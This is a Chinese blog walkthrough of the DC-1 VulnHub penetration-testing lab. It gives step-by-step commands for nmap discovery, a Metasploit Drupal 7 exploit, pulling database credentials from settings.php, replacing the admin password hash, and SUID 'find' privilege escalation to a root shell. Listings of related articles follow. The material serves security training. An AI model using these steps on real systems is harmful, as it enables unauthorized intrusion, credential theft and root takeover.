DC-1靶场通关详解

最新推荐文章于 2024-10-11 16:53:41 发布
最新推荐文章于 2024-10-11 16:53:41 发布
阅读量820 收藏 13
点赞数 29
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/j206923/article/details/142219074
版权

渗透靶场

本环境重在两个知识点(如下):

Druopal 7 (漏洞利用)

Find (提权)

  1. 目标:

靶场IP为:XXX.XXX.XXX.XXX/24

  1. 寻找靶机真实IP

nmap -sP XXX.XXX.XXX.XXX/24

使用 -sP参数 ,ping扫描,不扫描端口。

  1. 查看端口及服务

nmap -A -p- -v 192.168.184.131

-A 全面扫描

-v IP地址 显示扫描过程

发现开放了22、80、111端口,22端口开放了ssh服务,80端口存在web服务Drupal 7,111端口开放了rpcbind服务。

打开kali中自带的火狐

访问Web站点(靶机IP)

发现是一个电信的drupal服务,根据nmap结果显示得到当前运行的是Drupal 7的CMS

Searchsploit drupal 7

可以在浏览器上搜索相关版本的漏洞

4、利用MSF渗透

msfconsole 进入MSF控制台

search Drupal 搜索drupal模块

5、选择模块进行测试

这里我们使用2018这一模块

use 1 使用2018模块

设置靶机IP运行MSF

show options 查看信息

set rhosts 靶机IP

run 进行攻击

在linux中有很多类型的shell,不同的shell具备不同的功能,shell还决定了脚本中函数的语法,Linux中默认的shell是/bash/bash,流行的shell有ash、bash、ksh、csh、zsh等,不同的shell都有自己的特点以及用途

Linux中whoami命令用于显示用户名称

可以看到www-data权限

进入home目录下,发现了flag4.txt

这里提示我们需要提升下权限

  1. 使用python反弹一个交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

显示出当前的文件路径

  1. 发现flag1文件

查看www目录下文件,发现flag1.txt文件,打开后内容翻译如下

cd /var/www 回到www目录下

ls 查看目录下的文件

cat flag1.txt 查看flag1.txt文件内容

发现flag2文件

drupal的默认配置文件为 /var/www/sites/default/settings.php

查看文件内容

cat /var/www/sites/default/settings.php

可以看到flag2中数据库的账号密码

'username' => 'dbuser',

'password' => 'R0ck3t',

mysql -u dbuser -p

切换到dbuser数据库,输入密码(R0ck3t)

show databases; (查看数据库)

use drupaldb

show tables; (查看drupaldb中的表)

查看默认的drupal user表

select * from users;

可以看到admin的信息

密码是乱码,可以通过置换drupal密码来解决

输入quit;/ exit;(二者都可以)

退回到www目录下

php scripts/password-hash.sh  321(密码根据自身自定义)

进入数据库把密码字段进行替换,进入mysql,输入密码切换到drupaldb数据库

mysql -u dbuser -pR0ck3t

use drupaldb

将 pass字段进行替换

update users set pass="$S$DMjkpFCtara55Q7ySPYqDsKSp5f0bQBBTQn4NjgnuiaKXmjdc8OK" where name="admin";

替换完成后访问Web站点登录

账号:admin

密码是我们自己替换的

admin

321

成功登陆进去后随便翻一翻

发现了flag3,点击flag3后发现提示信息大致意思如下

提权并提示-exec,想到suid提权find命令

在执行过程中,调用者会暂时获得该文件的所有者权限,且该权限只在程序执行的过程中有效。

只有root用户的uid是0,如果把一个普通用户的uid修改为0,那么只要以普通用户的用户名和密码登录系统就会自动切换到root用户,在系统加固时一定要找出有哪些用户的uid为0。

假设可执行文件binexec其属主为root,当以非root身份登录时,如binexec设置了suid权限,就可以在非root身份下运行该可执行文件,可执行文件运行时该进程的权限为root权限。

利用此特性,就可通过suid进行提权。

退回到www目录下

find / -perm -4000 2>/dev/null

发现find命令

用命令测试,可发现为root权限

touch 321

ls

find / -name 321 -exec "whoami" \;

发现最后的flag文件

切换语句进入shell,执行whoami查看当前权限,执行ls查看当前目录下文件,切换到root目录,查看文件,发现cat thefinalflag.txt文件。

find ./ -name 321 -exec "/bin/sh" \;   

whoami

ls

cd /root

ls

查看cat thefinalflag.txt文件

cat thefinalflag.txt

内容意思如下:

发现flag4

 此时我们查看 /etc/passwd 文件,发现存在 flag4 用户,我们也可以使用 hydra 进行爆破

cat /etc/passwd

夜亦有华
关注
DC-6靶场
qq_49518993的博客
08-31 1245
DC-6靶场
Vulhub-DC-1靶场通关攻略
weixin_51339377的博客
03-16 3731
靶场环境配置: 修改为usb1.0同时新建网络,把网络修改为NAT即可 首先开启靶机环境和kali黑客机器环境 通过NAT模式可以保证两者处于同一个内网环境中 切记 vmware和virtualbox的虚拟网卡可能网段不同 所以要保证kali和靶机在同一个网段 否则无法扫描到相应的靶机 1.第一步 通过kali中自带的一个工具 arp-scan进行内网存活主机探测 arp-scan -l 2.接下来可以借助nmap对目标进行扫描 其中 -sV服务指纹识别 可以探测目标系统...
DC-3靶场实战详解
a310034188的博客
01-26 1万+
环境安装 前面安装了老版本的DC-3几次,nmap都扫描不到机器,后来琢磨了很久也找不到问题,然后我去官网重新下载了个就没问题了 官网地址:https://www.vulnhub.com/entry/dc-32,312/ KALI和DC-3都用NAT模式. DC-3需要多修改一些东西 把IDE里面的改成IDE 0:0 都完成后开启KALI与DC-3 寻找FLAG 信息收集 1.首先确认kali与DC-3所在网段 ip add 确认kali与DC-3所在网段为192.168.79.0/2
渗透测试综合靶场 DC-1 通关详解
goldfish8848的博客
09-18 1333
我们收集信息的第一步首先用到了nmap来探测IP和开放端口。nmap(网络映射器)是一款开源的网络扫描和安全审计工具,它可以用来发现网络上的设备,检测开放的端口,确定运行在网络设备上的服务及其版本信息,以及检测潜在的安全漏洞。常用nmap命令:nmap -sn 目标IP地址:快速扫描目标网络,仅用于主机发现,不扫描端口。nmap -sn 目标IP地址/24:扫描整个C类子网。nmap 目标IP地址:扫描目标IP地址上的常见端口。nmap -p 端口号 目标IP地址:扫描特定端口。
DC-1渗透靶场实战速通版
saber的博客
12-01 997
开启 Kali 和 DC靶机,确保二者互相可以ping通,Kali地址根据命令可以查找到,但是DC靶机我们是没有画面的,只是开启了一个环境,我们可以在虚拟机的设置里面找到。得出新的admin的密码后,又开始重复步骤,登录数据库,使用数据库语句修改指定表指定字段中的值,修改密码为我们123456加密后的值。回到终端,退出数据库,使用命令查看提示文件。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 9252
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-05 1882
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-3 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-06 1252
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
DC-1靶场搭建及渗透实战详细过程(DC靶场系列)
热门推荐
金 帛的博客
06-29 1万+
DC-1靶场渗透过程,写的有点多,把许多方法尽可能地列出来了,也参考了很多别的文章,希望对刚学习web渗透的小白有所帮助吧!
vulnhub通关-2 DC-2(含靶场资源)
Brucye
02-01 1002
WPScan是一个开源的网络安全工具,专门用于发现WordPress网站中的安全漏洞。BASH_CMD通常不是一个标准的环境变量。不过,如果你在某些脚本或配置文件中看到BASH_CMD,它可能是一个自定义的环境变量用于存储一个bash命令或者命令的路径。这个变量的具体含义和用途取决于它在脚本或配置中的上下文。命令解释:export 用于添加环境变量,su在/bin目录下,所以添加/bin目录。
DC-5靶场
qq_49518993的博客
09-24 898
dc-5靶场练习
DC-1靶场渗透实验
Alashan12的博客
05-05 1987
一、环境准备 Kali虚拟机 DC-1靶场http://www.five86.com/downloads/DC-1.zip 首先将kali虚拟机和靶机DC1都设置为net模式 ifconfig查看kali的IP为192.168.152.128 使用nmap扫描此网段下的主机 启动DC-1靶机 再次扫描得到DC-1靶机的IP地址为192.168.152.138 二、实验过程 使用nmap针对该IP进行详细扫描 发现打开了22、80和111的端口,还开启了s...
Vulnhub系列之DC1靶场详解
weixin_50053818的博客
05-04 3635
文章目录环境drupal 7.x漏洞拿flag1在目录中找配置文件拿flag2改密码进网站拿flag2ssh爆破拿flag4提权拿最后的flag 环境 DC-1靶场 VMware虚拟机 kali drupal 7.x漏洞拿flag1 首先搭建好靶场。这次一次黑盒靶场测试,只能从虚拟机中查看DC1靶场的mac地址,从而查出目标靶机的IP。 所以目标IP地址为192.168.31.184,直接上nmap进行目标全面扫描。 由nmap扫描可以知道,目标靶机开放了22,80,111,42875端口,看到端
DC-8靶场
qq_49518993的博客
08-27 917
DC-8靶场
IP数据包
最新发布
permit7的博客
10-11 946
ARP协议是地址解析协议(Address Resolution Protocol)是通过解析IP地址得到MAC地址的,是一个在网络协议包中极其重要的网络传输协议,它与网卡有着极其密切的关系,在TCP/IP分层结构中,把ARP划分为网络层。
2024年网络安全进阶学习路径-2024年进阶学习指南
2401_85026965的博客
10-10 2021
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全学习路线图(2024版详解
baimaozi008的博客
10-10 975
近期,大家在网上对于网络安全讨论比较多,想要学习的人也不少,但是需要学习哪些内容,按照什么顺序去学习呢?其实我们已经出国多版本的路线图,一直以来效果也比较不错,本次我们针对市场需求,整理了一套系统的路线图,供大家学习参考。希望大家按照路线图进行系统学习不仅可以的完成上岸,还能够系统化学习,提升自己的后期竞争力。
WireShark过滤器
ngczx的博客
10-11 659
Wireshark的过滤器规则可以分为**捕获过滤器**和**显示过滤器**,这两种过滤器有不同的编写规则
Netty 相比原生IO模型的优势
lssffy的博客
10-09 654
Java提供了多种I/O模型,每种模型都有其适用的场景和特点,随着网络应用需求的变化,I/O模型也在不断发展。阻塞I/O(BIO,Blocking I/O)传统的I/O模型,使用简单,但每次I/O操作都会阻塞线程。每个请求需要独立的线程来处理,这在并发请求较少时问题不大,但在高并发情况下,线程资源将成为瓶颈。非阻塞I/O(NIO,Non-Blocking I/O)引入了多路复用技术,一个线程可以处理多个连接,避免了BIO中每个连接占用一个线程的问题。通过Selector。
DC-1靶场攻防:信息收集与Drupal漏洞挖掘
"DC-1靶场的攻防演练教程" 在网络安全领域,靶场是进行安全测试和技能提升的重要平台。本教程聚焦于名为DC-1的靶机,通过一系列步骤来展示如何找到并利用靶机上的漏洞来获取flag。下面我们将详细探讨这个过程。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值